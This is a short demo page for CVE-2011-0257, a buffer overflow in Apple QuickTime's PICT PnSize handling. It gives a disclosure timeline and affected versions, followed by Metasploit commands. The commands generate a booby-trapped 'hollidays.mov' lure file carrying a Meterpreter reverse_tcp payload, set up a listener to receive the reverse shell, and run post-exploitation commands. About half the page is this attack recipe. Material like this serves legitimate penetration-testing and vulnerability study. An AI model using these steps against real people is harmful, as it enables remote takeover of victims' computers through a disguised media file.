CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo

Timeline :

Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-11
Coordinated public release of the vulnerability the 2011-08-08
Metasploit PoC provided the 2011-09-03

PoC provided by :

MC

Reference(s) :

CVE-2011-0257
ZDI-11-252

Affected version(s) :

All Apple QuickTime Player previous to version 7.7

Tested on Windows XP SP3 with :

Apple QuickTime Player 7.6 (472)

Description :

This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo